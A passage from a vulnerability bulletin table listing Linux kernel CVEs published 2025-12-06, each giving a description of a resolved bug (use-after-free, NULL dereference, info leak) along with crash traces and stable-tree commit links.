https://git.kernel.org/stable/c/ece3b981bb6620e47fac826a2156c090b1a936a0 https://git.kernel.org/stable/c/98e9d5e33bda8db875cc1a4fe99c192658e45ab6 https://git.kernel.org/stable/c/d2c04f20ccc6c0d219e6d3038bab45bc66a178ad https://git.kernel.org/stable/c/05a1fc5efdd8560f34a3af39c9cf1e1526cc3ddf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm, swap: fix potential UAF issue for VMA readahead Since commit 78524b05f1a3 ("mm, swap: avoid redundant swap device pinning"), the common helper for allocating and preparing a folio in the swap cache layer no longer tries to get a swap device reference internally, because all callers of __read_swap_cache_async are already holding a swap entry reference. The repeated swap device pinning isn't needed on the same swap device. Caller of VMA readahead is also holding a reference to the target entry's swap device, but VMA readahead walks the page table, so it might encounter swap entries from other devices, and call __read_swap_cache_async on another device without holding a reference to it. So it is possible to cause a UAF when swapoff of device A raced with swapin on device B, and VMA readahead tries to read swap entries from device A. It's not easy to trigger, but in theory, it could cause real issues. Make VMA readahead try to get the device reference first if the swap device is a different one from the target entry. | 2025-12-06 | not yet calculated | CVE-2025-40270 | https://git.kernel.org/stable/c/a4145be7b56bfa87dce56415c3ad993071462b8a https://git.kernel.org/stable/c/1c2a936edd71e133f2806e68324ec81a4eb07588 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/proc: fix uaf in proc_readdir_de() Pde is erased from subdir rbtree through rb_erase(), but not set the node to EMPTY, which may result in uaf access. We should use RB_CLEAR_NODE() set the erased node to EMPTY, then pde_subdir_next() will return NULL to avoid uaf access. We found an uaf issue while using stress-ng testing, need to run testcase getdent and tun in the same time. The steps of the issue is as follows: 1) use getdent to traverse dir /proc/pid/net/dev_snmp6/, and current pde is tun3; 2) in the [time windows] unregister netdevice tun3 and tun2, and erase them from rbtree. erase tun3 first, and then erase tun2. the pde(tun2) will be released to slab; 3) continue to getdent process, then pde_subdir_next() will return pde(tun2) which is released, it will case uaf access. CPU 0 | CPU 1 ------------------------------------------------------------------------- traverse dir /proc/pid/net/dev_snmp6/ | unregister_netdevice(tun->dev) //tun3 tun2 sys_getdents64() | iterate_dir() | proc_readdir() | proc_readdir_de() | snmp6_unregister_dev() pde_get(de); | proc_remove() read_unlock(&proc_subdir_lock); | remove_proc_subtree() | write_lock(&proc_subdir_lock); [time window] | rb_erase(&root->subdir_node, &parent->subdir); | write_unlock(&proc_subdir_lock); read_lock(&proc_subdir_lock); | next = pde_subdir_next(de); | pde_put(de); | de = next; //UAF | rbtree of dev_snmp6 | pde(tun3) / \ NULL pde(tun2) | 2025-12-06 | not yet calculated | CVE-2025-40271 | https://git.kernel.org/stable/c/1d1596d68a6f11d28f677eedf6cf5b17dbfeb491 https://git.kernel.org/stable/c/c81d0385500446efe48c305bbb83d47f2ae23a50 https://git.kernel.org/stable/c/4cba73c4c89219beef7685a47374bf88b1022369 https://git.kernel.org/stable/c/6f2482745e510ae1dacc9b090194b9c5f918d774 https://git.kernel.org/stable/c/67272c11f379d9aa5e0f6b16286b9d89b3f76046 https://git.kernel.org/stable/c/623bb26127fb581a741e880e1e1a47d79aecb6f8 https://git.kernel.org/stable/c/03de7ff197a3d0e17d0d5c58fdac99a63cba8110 https://git.kernel.org/stable/c/895b4c0c79b092d732544011c3cecaf7322c36a1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/secretmem: fix use-after-free race in fault handler When a page fault occurs in a secret memory file created with `memfd_secret(2)`, the kernel will allocate a new folio for it, mark the underlying page as not-present in the direct map, and add it to the file mapping. If two tasks cause a fault in the same page concurrently, both could end up allocating a folio and removing the page from the direct map, but only one would succeed in adding the folio to the file mapping. The task that failed undoes the effects of its attempt by (a) freeing the folio again and (b) putting the page back into the direct map. However, by doing these two operations in this order, the page becomes available to the allocator again before it is placed back in the direct mapping. If another task attempts to allocate the page between (a) and (b), and the kernel tries to access it via the direct map, it would result in a supervisor not-present page fault. Fix the ordering to restore the direct map before the folio is freed. | 2025-12-06 | not yet calculated | CVE-2025-40272 | https://git.kernel.org/stable/c/bb1c19636aedae39360e6fdbcaef4f2bcff25785 https://git.kernel.org/stable/c/1e4643d6628edf9c0047b1f8f5bc574665025acb https://git.kernel.org/stable/c/42d486d35a4143cc37fc72ee66edc99d942dd367 https://git.kernel.org/stable/c/52f2d5cf33de9a8f5e72bbb0ed38282ae0bc4649 https://git.kernel.org/stable/c/4444767e625da46009fc94a453fd1967b80ba047 https://git.kernel.org/stable/c/6f86d0534fddfbd08687fa0f01479d4226bc3c3d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: NFSD: free copynotify stateid in nfs4_free_ol_stateid() Typically copynotify stateid is freed either when parent's stateid is being close/freed or in nfsd4_laundromat if the stateid hasn't been used in a lease period. However, in case when the server got an OPEN (which created a parent stateid), followed by a COPY_NOTIFY using that stateid, followed by a client reboot. New client instance while doing CREATE_SESSION would force expire previous state of this client. It leads to the open state being freed thru release_openowner-> nfs4_free_ol_stateid() and it finds that it still has copynotify stateid associated with it. We currently print a warning and is triggerred WARNING: CPU: 1 PID: 8858 at fs/nfsd/nfs4state.c:1550 nfs4_free_ol_stateid+0xb0/0x100 [nfsd] This patch, instead, frees the associated copynotify stateid here. If the parent stateid is freed (without freeing the copynotify stateids associated with it), it leads to the list corruption when laundromat ends up freeing the copynotify state later. [ 1626.839430] Internal error: Oops - BUG: 00000000f2000800 [#1] SMP [ 1626.842828] Modules linked in: nfnetlink_queue nfnetlink_log bluetooth cfg80211 rpcrdma rdma_cm iw_cm ib_cm ib_core nfsd nfs_acl lockd grace nfs_localio ext4 crc16 mbcache jbd2 overlay uinput snd_seq_dummy snd_hrtimer qrtr rfkill vfat fat uvcvideo snd_hda_codec_generic videobuf2_vmalloc videobuf2_memops snd_hda_intel uvc snd_intel_dspcfg videobuf2_v4l2 videobuf2_common snd_hda_codec snd_hda_core videodev snd_hwdep snd_seq mc snd_seq_device snd_pcm snd_timer snd soundcore sg loop auth_rpcgss vsock_loopback vmw_vsock_virtio_transport_common vmw_vsock_vmci_transport vmw_vmci vsock xfs 8021q garp stp llc mrp nvme ghash_ce e1000e nvme_core sr_mod nvme_keyring nvme_auth cdrom vmwgfx drm_ttm_helper ttm sunrpc dm_mirror dm_region_hash dm_log iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi fuse dm_multipath dm_mod nfnetlink [ 1626.855594] CPU: 2 UID: 0 PID: 199 Comm: kworker/u24:33 Kdump: loaded Tainted: G B W 6.17.0-rc7+ #22 PREEMPT(voluntary) [ 1626.857075] Tainted: [B]=BAD_PAGE, [W]=WARN [ 1626.857573] Hardware name: VMware, Inc. VMware20,1/VBSA, BIOS VMW201.00V.24006586.BA64.2406042154 06/04/2024 [ 1626.858724] Workqueue: nfsd4 laundromat_main [nfsd] [ 1626.859304] pstate: 61400005 (nZCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--) [ 1626.860010] pc : __list_del_entry_valid_or_report+0x148/0x200 [ 1626.860601] lr : __list_del_entry_valid_or_report+0x148/0x200 [ 1626.861182] sp : ffff8000881d7a40 [ 1626.861521] x29: ffff8000881d7a40 x28: 0000000000000018 x27: ffff0000c2a98200 [ 1626.862260] x26: 0000000000000600 x25: 0000000000000000 x24: ffff8000881d7b20 [ 1626.862986] x23: ffff0000c2a981e8 x22: 1fffe00012410e7d x21: ffff0000920873e8 [ 1626.863701] x20: ffff0000920873e8 x19: ffff000086f22998 x18: 0000000000000000 [ 1626.864421] x17: 20747562202c3839 x16: 3932326636383030 x15: 3030666666662065 [ 1626.865092] x14: 6220646c756f6873 x13: 0000000000000001 x12: ffff60004fd9e4a3 [ 1626.865713] x11: 1fffe0004fd9e4a2 x10: ffff60004fd9e4a2 x9 : dfff800000000000 [ 1626.866320] x8 : 00009fffb0261b5e x7 : ffff00027ecf2513 x6 : 0000000000000001 [ 1626.866938] x5 : ffff00027ecf2510 x4 : ffff60004fd9e4a3 x3 : 0000000000000000 [ 1626.867553] x2 : 0000000000000000 x1 : ffff000096069640 x0 : 000000000000006d [ 1626.868167] Call trace: [ 1626.868382] __list_del_entry_valid_or_report+0x148/0x200 (P) [ 1626.868876] _free_cpntf_state_locked+0xd0/0x268 [nfsd] [ 1626.869368] nfs4_laundromat+0x6f8/0x1058 [nfsd] [ 1626.869813] laundromat_main+0x24/0x60 [nfsd] [ 1626.870231] process_one_work+0x584/0x1050 [ 1626.870595] worker_thread+0x4c4/0xc60 [ 1626.870893] kthread+0x2f8/0x398 [ 1626.871146] ret_from_fork+0x10/0x20 [ 1626.871422] Code: aa1303e1 aa1403e3 910e8000 97bc55d7 (d4210000) [ 1626.871892] SMP: stopping secondary CPUs | 2025-12-06 | not yet calculated | CVE-2025-40273 | https://git.kernel.org/stable/c/935a2dc8928670bb2c37e21025331e61ec48ccf4 https://git.kernel.org/stable/c/b114996a095da39e38410a0328d4a8aca8c36088 https://git.kernel.org/stable/c/839f56f626723f36904764858467e7a3881b975d https://git.kernel.org/stable/c/29fbb3ad4018ca2b0988fbac76f4c694cc6d7e66 https://git.kernel.org/stable/c/d7be15a634aa3874827d0d3ea47452ee878b8df7 https://git.kernel.org/stable/c/f67ad9b33b0e6f00d2acc67cbf9cfa5c756be5fb https://git.kernel.org/stable/c/4aa17144d5abc3c756883e3a010246f0dba8b468 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: guest_memfd: Remove bindings on memslot deletion when gmem is dying When unbinding a memslot from a guest_memfd instance, remove the bindings even if the guest_memfd file is dying, i.e. even if its file refcount has gone to zero. If the memslot is freed before the file is fully released, nullifying the memslot side of the binding in kvm_gmem_release() will write to freed memory, as detected by syzbot+KASAN: ================================================================== BUG: KASAN: slab-use-after-free in kvm_gmem_release+0x176/0x440 virt/kvm/guest_memfd.c:353 Write of size 8 at addr ffff88807befa508 by task syz.0.17/6022 CPU: 0 UID: 0 PID: 6022 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025 Call Trace: <TASK> dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xca/0x240 mm/kasan/report.c:482 kasan_report+0x118/0x150 mm/kasan/report.c:595 kvm_gmem_release+0x176/0x440 virt/kvm/guest_memfd.c:353 __fput+0x44c/0xa70 fs/file_table.c:468 task_work_run+0x1d4/0x260 kernel/task_work.c:227 resume_user_mode_work include/linux/resume_user_mode.h:50 [inline] exit_to_user_mode_loop+0xe9/0x130 kernel/entry/common.c:43 exit_to_user_mode_prepare include/linux/irq-entry-common.h:225 [inline] syscall_exit_to_user_mode_work include/linux/entry-common.h:175 [inline] syscall_exit_to_user_mode include/linux/entry-common.h:210 [inline] do_syscall_64+0x2bd/0xfa0 arch/x86/entry/syscall_64.c:100 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7fbeeff8efc9 </TASK> Allocated by task 6023: kasan_save_stack mm/kasan/common.c:56 [inline] kasan_save_track+0x3e/0x80 mm/kasan/common.c:77 poison_kmalloc_redzone mm/kasan/common.c:397 [inline] __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:414 kasan_kmalloc include/linux/kasan.h:262 [inline] __kmalloc_cache_noprof+0x3e2/0x700 mm/slub.c:5758 kmalloc_noprof include/linux/slab.h:957 [inline] kzalloc_noprof include/linux/slab.h:1094 [inline] kvm_set_memory_region+0x747/0xb90 virt/kvm/kvm_main.c:2104 kvm_vm_ioctl_set_memory_region+0x6f/0xd0 virt/kvm/kvm_main.c:2154 kvm_vm_ioctl+0x957/0xc60 virt/kvm/kvm_main.c:5201 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:597 [inline] __se_sys_ioctl+0xfc/0x170 fs/ioctl.c:583 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f Freed by task 6023: kasan_save_stack mm/kasan/common.c:56 [inline] kasan_save_track+0x3e/0x80 mm/kasan/common.c:77 kasan_save_free_info+0x46/0x50 mm/kasan/generic.c:584 poison_slab_object mm/kasan/common.c:252 [inline] __kasan_slab_free+0x5c/0x80 mm/kasan/common.c:284 kasan_slab_free include/linux/kasan.h:234 [inline] slab_free_hook mm/slub.c:2533 [inline] slab_free mm/slub.c:6622 [inline] kfree+0x19a/0x6d0 mm/slub.c:6829 kvm_set_memory_region+0x9c4/0xb90 virt/kvm/kvm_main.c:2130 kvm_vm_ioctl_set_memory_region+0x6f/0xd0 virt/kvm/kvm_main.c:2154 kvm_vm_ioctl+0x957/0xc60 virt/kvm/kvm_main.c:5201 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:597 [inline] __se_sys_ioctl+0xfc/0x170 fs/ioctl.c:583 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f Deliberately don't acquire filemap invalid lock when the file is dying as the lifecycle of f_mapping is outside the purview of KVM. Dereferencing the mapping is *probably* fine, but there's no need to invalidate anything as memslot deletion is responsible for zapping SPTEs, and the only code that can access the dying file is kvm_gmem_release(), whose core code is mutual ---truncated--- | 2025-12-06 | not yet calculated | CVE-2025-40274 | https://git.kernel.org/stable/c/a8ac2bd0f98e1a230f1eb3260fa552bf2ef1753b https://git.kernel.org/stable/c/393893693a523e053f84d69320d090b93503f79f https://git.kernel.org/stable/c/ae431059e75d36170a5ae6b44cc4d06d43613215 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: usb-audio: Fix NULL pointer dereference in snd_usb_mixer_controls_badd In snd_usb_create_streams(), for UAC version 3 devices, the Interface Association Descriptor (IAD) is retrieved via usb_ifnum_to_if(). If this call fails, a fallback routine attempts to obtain the IAD from the next interface and sets a BADD profile. However, snd_usb_mixer_controls_badd() assumes that the IAD retrieved from usb_ifnum_to_if() is always valid, without performing a NULL check. This can lead to a NULL pointer dereference when usb_ifnum_to_if() fails to find the interface descriptor. This patch adds a NULL pointer check after calling usb_ifnum_to_if() in snd_usb_mixer_controls_badd() to prevent the dereference. This issue was discovered by syzkaller, which triggered the bug by sending a crafted USB device descriptor. | 2025-12-06 | not yet calculated | CVE-2025-40275 | https://git.kernel.org/stable/c/23aea9c74aeea2625aaf4fbcc6beb9d09e30f9e4 https://git.kernel.org/stable/c/c5c08965ab96b16361e69a1e2a0e89dbcb99b5a6 https://git.kernel.org/stable/c/9f282104627be5fbded3102ff9004f753c55a063 https://git.kernel.org/stable/c/2762d3ea9c929ca4094541ca517c317ffa94625b https://git.kernel.org/stable/c/57f607c112966c21240c424b33e2cb71e121dcf0 https://git.kernel.org/stable/c/cbdbfc756f2990942138ed0138da9303b4dbf9ff https://git.kernel.org/stable/c/85568535893600024d7d8794f4f8b6428b521e0c https://git.kernel.org/stable/c/632108ec072ad64c8c83db6e16a7efee29ebfb74 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/panthor: Flush shmem writes before mapping buffers CPU-uncached The shmem layer zeroes out the new pages using cached mappings, and if we don't CPU-flush we might leave dirty cachelines behind, leading to potential data leaks and/or asynchronous buffer corruption when dirty cachelines are evicted. | 2025-12-06 | not yet calculated | CVE-2025-40276 | https://git.kernel.org/stable/c/7a12f9c96d06b145562f76ffb20369b4692f0911 https://git.kernel.org/stable/c/576c930e5e7dcb937648490611a83f1bf0171048 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/vmwgfx: Validate command header size against SVGA_CMD_MAX_DATASIZE This data originates from userspace and is used in buffer offset calculations which could potentially overflow causing an out-of-bounds access. | 2025-12-06 | not yet calculated | CVE-2025-40277 | https://git.kernel.org/stable/c/e58559845021c3bad5e094219378b869157fad53 https://git.kernel.org/stable/c/54d458b244893e47bda52ec3943fdfbc8d7d068b https://git.kernel.org/stable/c/709e5c088f9c99a5cf2c1d1c6ce58f2cca7ab173 https://git.kernel.org/stable/c/a3abb54c27b2c393c44362399777ad2f6e1ff17e https://git.kernel.org/stable/c/b5df9e06eed3df6a4f5c6f8453013b0cabb927b4 https://git.kernel.org/stable/c/5aea2cde03d4247cdcf53f9ab7d0747c9dca1cfc https://git.kernel.org/stable/c/f3f3a8eb3f0ba799fae057091d8c67cca12d6fa0 https://git.kernel.org/stable/c/32b415a9dc2c212e809b7ebc2b14bc3fbda2b9af |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: sched: act_ife: initialize struct tc_ife to fix KMSAN kernel-infoleak Fix a KMSAN kernel-infoleak detected by the syzbot . [net?] KMSAN: kernel-infoleak in __skb_datagram_iter In tcf_ife_dump(), the variable 'opt' was partially initialized using a designatied initializer. While the padding bytes are reamined uninitialized. nla_put() copies the entire structure into a netlink message, these uninitialized bytes leaked to userspace. Initialize the structure with memset before assigning its fields to ensure all members and padding are cleared prior to beign copied. This change silences the KMSAN report and prevents potential information leaks from the kernel memory. This fix has been tested and validated by syzbot. This patch closes the bug reported at the following syzkaller link and ensures no infoleak. | 2025-12-06 | not yet calculated | CVE-2025-40278 | https://git.kernel.org/stable/c/918e063304f945fb93be9bb70cacea07d0b730ea https://git.kernel.org/stable/c/5e3644ef147bf7140259dfa4cace680c9b26fe8b https://git.kernel.org/stable/c/37f0680887c5aeba9a433fe04b35169010568bb1 https://git.kernel.org/stable/c/2191662058443e0bcc28d11694293d8339af6dde https://git.kernel.org/stable/c/a676a296af65d33725bdf7396803180957dbd92e https://git.kernel.org/stable/c/d1dbbbe839647486c9b893e5011fe84a052962df https://git.kernel.org/stable/c/c8f51dad94cbb88054e2aacc272b3ce1ed11fb1e https://git.kernel.org/stable/c/ce50039be49eea9b4cd8873ca6eccded1b4a130a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: sched: act_connmark: initialize struct tc_ife to fix kernel leak In tcf_connmark_dump(), the variable 'opt' was partially initialized using a designatied initializer. While the padding bytes are reamined uninitialized. nla_put() copies the entire structure into a netlink message, these uninitialized bytes leaked to userspace. Initialize the structure with memset before assigning its fields to ensure all members and padding are cleared prior to beign copied. | 2025-12-06 | not yet calculated | CVE-2025-40279 | https://git.kernel.org/stable/c/218b67c8c8246d47a2a7910eae80abe4861fe2b7 https://git.kernel.org/stable/c/73cc56c608c209d3d666cc571293b090a471da70 https://git.kernel.org/stable/c/31e4aa93e2e5b5647fc235b0f6ee329646878f9e https://git.kernel.org/stable/c/51cb05d4fd632596816ba44e882e84db9fb28a7e https://git.kernel.org/stable/c/25837889ec062f2b7618142cd80253dff3da5343 https://git.kernel.org/stable/c/62b656e43eaeae445a39cd8021a4f47065af4389 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tipc: Fix use-after-free in tipc_mon_reinit_self(). syzbot reported use-after-free of tipc_net(net)->monitors[] in tipc_mon_reinit_self(). [0] The array is protected by RTNL, but tipc_mon_reinit_self() iterates over it without RTNL. tipc_mon_reinit_self() is called from tipc_net_finalize(), which is always under RTNL except for tipc_net_finalize_work(). Let's hold RTNL in tipc_net_finalize_work(). [0]: BUG: KASAN: slab-use-after-free in __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:110 [inline] BUG: KASAN: slab-use-after-free in _raw_spin_lock_irqsave+0xa7/0xf0 kernel/locking/spinlock.c:162 Read of size 1 at addr ffff88805eae1030 by task kworker/0:7/5989 CPU: 0 UID: 0 PID: 5989 Comm: kworker/0:7 Not tainted syzkaller #0 PREEMPT_{RT,(full)} Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/18/2025 Workqueue: events tipc_net_finalize_work Call Trace: <TASK> dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xca/0x240 mm/kasan/report.c:482 kasan_report+0x118/0x150 mm/kasan/report.c:595 __kasan_check_byte+0x2a/0x40 mm/kasan/common.c:568 kasan_check_byte include/linux/kasan.h:399 [inline] lock_acquire+0x8d/0x360 kernel/locking/lockdep.c:5842 __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:110 [inline] _raw_spin_lock_irqsave+0xa7/0xf0 kernel/locking/spinlock.c:162 rtlock_slowlock kernel/locking/rtmutex.c:1894 [inline] rwbase_rtmutex_lock_state kernel/locking/spinlock_rt.c:160 [inline] rwbase_write_lock+0xd3/0x7e0 kernel/locking/rwbase_rt.c:244 rt_write_lock+0x76/0x110 kernel/locking/spinlock_rt.c:243 write_lock_bh include/linux/rwlock_rt.h:99 [inline] tipc_mon_reinit_self+0x79/0x430 net/tipc/monitor.c:718 tipc_net_finalize+0x115/0x190 net/tipc/net.c:140 process_one_work kernel/workqueue.c:3236 [inline] process_scheduled_works+0xade/0x17b0 kernel/workqueue.c:3319 worker_thread+0x8a0/0xda0 kernel/workqueue.c:3400 kthread+0x70e/0x8a0 kernel/kthread.c:463 ret_from_fork+0x439/0x7d0 arch/x86/kernel/process.c:148 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245 </TASK> Allocated by task 6089: kasan_save_stack mm/kasan/common.c:47 [inline] kasan_save_track+0x3e/0x80 mm/kasan/common.c:68 poison_kmalloc_redzone mm/kasan/common.c:388 [inline] __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:405 kasan_kmalloc include/linux/kasan.h:260 [inline] __kmalloc_cache_noprof+0x1a8/0x320 mm/slub.c:4407 kmalloc_noprof include/linux/slab.h:905 [inline] kzalloc_noprof include/linux/slab.h:1039 [inline] tipc_mon_create+0xc3/0x4d0 net/tipc/monitor.c:657 tipc_enable_bearer net/tipc/bearer.c:357 [inline] __tipc_nl_bearer_enable+0xe16/0x13f0 net/tipc/bearer.c:1047 __tipc_nl_compat_doit net/tipc/netlink_compat.c:371 [inline] tipc_nl_compat_doit+0x3bc/0x5f0 net/tipc/netlink_compat.c:393 tipc_nl_compat_handle net/tipc/netlink_compat.c:-1 [inline] tipc_nl_compat_recv+0x83c/0xbe0 net/tipc/netlink_compat.c:1321 genl_family_rcv_msg_doit+0x215/0x300 net/netlink/genetlink.c:1115 genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline] genl_rcv_msg+0x60e/0x790 net/netlink/genetlink.c:1210 netlink_rcv_skb+0x208/0x470 net/netlink/af_netlink.c:2552 genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219 netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline] netlink_unicast+0x846/0xa10 net/netlink/af_netlink.c:1346 netlink_sendmsg+0x805/0xb30 net/netlink/af_netlink.c:1896 sock_sendmsg_nosec net/socket.c:714 [inline] __sock_sendmsg+0x21c/0x270 net/socket.c:729 ____sys_sendmsg+0x508/0x820 net/socket.c:2614 ___sys_sendmsg+0x21f/0x2a0 net/socket.c:2668 __sys_sendmsg net/socket.c:2700 [inline] __do_sys_sendmsg net/socket.c:2705 [inline] __se_sys_sendmsg net/socket.c:2703 [inline] __x64_sys_sendmsg+0x1a1/0x260 net/socket.c:2703 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xfa/0x3b0 arch/ ---truncated--- | 2025-12-06 | not yet calculated | CVE-2025-40280 | https://git.kernel.org/stable/c/5f541300b02ef8b2af34f6f7d41ce617f3571e88 https://git.kernel.org/stable/c/b2e77c789c234e7fe49057d2ced8f32e2d2c7901 https://git.kernel.org/stable/c/51b8f0ab888f8aa5dfac954918864eeda8c12c19 https://git.kernel.org/stable/c/499b5fa78d525c4450ebb76db83207db71efea77 https://git.kernel.org/stable/c/c92dbf85627b5c29e52d9c120a24e785801716df https://git.kernel.org/stable/c/f0104977fed25ebe001fd63dab2b6b7fefad3373 https://git.kernel.org/stable/c/fdf7c4c9af4f246323ce854e84b6aec198d49f7e https://git.kernel.org/stable/c/0725e6afb55128be21a2ca36e9674f573ccec173 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sctp: prevent possible shift-out-of-bounds in sctp_transport_update_rto syzbot reported a possible shift-out-of-bounds [1] Blamed commit added rto_alpha_max and rto_beta_max set to 1000. It is unclear if some sctp users are setting very large rto_alpha and/or rto_beta. In order to prevent user regression, perform the test at run time. Also add READ_ONCE() annotations as sysctl values can change under us. [1] UBSAN: shift-out-of-bounds in net/sctp/transport.c:509:41 shift exponent 64 is too large for 32-bit type 'unsigned int' CPU: 0 UID: 0 PID: 16704 Comm: syz.2.2320 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025 Call Trace: <TASK> __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0x16c/0x1f0 lib/dump_stack.c:120 ubsan_epilogue lib/ubsan.c:233 [inline] __ubsan_handle_shift_out_of_bounds+0x27f/0x420 lib/ubsan.c:494 sctp_transport_update_rto.cold+0x1c/0x34b net/sctp/transport.c:509 sctp_check_transmitted+0x11c4/0x1c30 net/sctp/outqueue.c:1502 sctp_outq_sack+0x4ef/0x1b20 net/sctp/outqueue.c:1338 sctp_cmd_process_sack net/sctp/sm_sideeffect.c:840 [inline] sctp_cmd_interpreter net/sctp/sm_sideeffect.c:1372 [inline] | 2025-12-06 | not yet calculated | CVE-2025-40281 | https://git.kernel.org/stable/c/0e0413e3315199b23ff4aec295e256034cd0a6e4 https://git.kernel.org/stable/c/834e65be429c0fa4f9bb5945064bd57f18ed2187 https://git.kernel.org/stable/c/abb086b9a95d0ed3b757ee59964ba3c4e4b2fc1a https://git.kernel.org/stable/c/d0d858652834dcf531342c82a0428170aa7c2675 https://git.kernel.org/stable/c/ed71f801249d2350c77a73dca2c03918a15a62fe https://git.kernel.org/stable/c/1cfa4eac275cc4875755c1303d48a4ddfe507ca8 https://git.kernel.org/stable/c/aaba523dd7b6106526c24b1fd9b5fc35e5aaa88d https://git.kernel.org/stable/c/1534ff77757e44bcc4b98d0196bc5c0052fce5fa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: 6lowpan: reset link-local header on ipv6 recv path Bluetooth 6lowpan.c netdev has header_ops, so it must set link-local header for RX skb, otherwise things crash, eg. with AF_PACKET SOCK_RAW Add missing skb_reset_mac_header() for uncompressed ipv6 RX path. For the compressed one, it is done in lowpan_header_decompress(). Log: (BlueZ 6lowpan-tester Client Recv Raw - Success) ------ kernel BUG at net/core/skbuff.c:212! Call Trace: <IRQ> ... packet_rcv (net/packet/af_packet.c:2152) ... <TASK> __local_bh_enable_ip (kernel/softirq.c:407) netif_rx (net/core/dev.c:5648) chan_recv_cb (net/bluetooth/6lowpan.c:294 net/bluetooth/6lowpan.c:359) ------ | 2025-12-06 | not yet calculated | CVE-2025-40282 | https://git.kernel.org/stable/c/ea46a1d217bc82e01cf3d0424e50ebfe251e34bf https://git.kernel.org/stable/c/973e0271754c77db3e1b6b69adf2de85a79a4c8b https://git.kernel.org/stable/c/d566e9a2bfc848941b091ffd5f4e12c4e889d818 https://git.kernel.org/stable/c/4ebb90c3c309e6375dc3e841af92e2a039843e62 https://git.kernel.org/stable/c/c24ac6cfe4f9a47180a65592c47e7a310d2f9d93 https://git.kernel.org/stable/c/11cd7e068381666f842ad41d1cc58eecd0c75237 https://git.kernel.org/stable/c/70d84e7c3a44b81020a3c3d650a64c63593405bd https://git.kernel.org/stable/c/3b78f50918276ab28fb22eac9aa49401ac436a3b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: btusb: reorder cleanup in btusb_disconnect to avoid UAF There is a KASAN: slab-use-after-free read in btusb_disconnect(). Calling "usb_driver_release_interface(&btusb_driver, data->intf)" will free the btusb data associated with the interface. The same data is then used later in the function, hence the UAF. Fix by moving the accesses to btusb data to before the data is free'd. | 2025-12-06 | not yet calculated | CVE-2025-40283 | https://git.kernel.org/stable/c/297dbf87989e09af98f81f2bcb938041785557e8 https://git.kernel.org/stable/c/f858f004bc343a7ae9f2533bbb2a3ab27428532f https://git.kernel.org/stable/c/7a6d1e740220ff9dfcb6a8c994d6ba49e76db198 https://git.kernel.org/stable/c/5dc00065a0496c36694afe11e52a5bc64524a9b8 https://git.kernel.org/stable/c/1c28c1e1522c773a94e26950ffb145e88cd9834b https://git.kernel.org/stable/c/95b9b98c93b1c0916a3d4cf4540b7f5d69145a0d https://git.kernel.org/stable/c/a2610ecd9fd5708be8997ca8f033e4200c0bb6af https://git.kernel.org/stable/c/23d22f2f71768034d6ef86168213843fc49bf550 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: MGMT: cancel mesh send timer when hdev removed mesh_send_done timer is not canceled when hdev is removed, which causes crash if the timer triggers after hdev is gone. Cancel the timer when MGMT removes the hdev, like other MGMT timers. Should fix the BUG: sporadically seen by BlueZ test bot (in "Mesh - Send cancel - 1" test). Log: ------ BUG: KASAN: slab-use-after-free in run_timer_softirq+0x76b/0x7d0 ... Freed by task 36: kasan_save_stack+0x24/0x50 kasan_save_track+0x14/0x30 __kasan_save_free_info+0x3a/0x60 __kasan_slab_free+0x43/0x70 kfree+0x103/0x500 device_release+0x9a/0x210 kobject_put+0x100/0x1e0 vhci_release+0x18b/0x240 ------ | 2025-12-06 | not yet calculated | CVE-2025-40284 | https://git.kernel.org/stable/c/990e6143b0ca0c66f099d67d00c112bf59b30d76 https://git.kernel.org/stable/c/2927ff643607eddf4f03d10ef80fe10d977154aa https://git.kernel.org/stable/c/7b6b6c077cad0601d62c3c34ab7ce3fb25deda7b https://git.kernel.org/stable/c/fd62ca5ad136dcf6f5aa308423b299a6be6f54ea 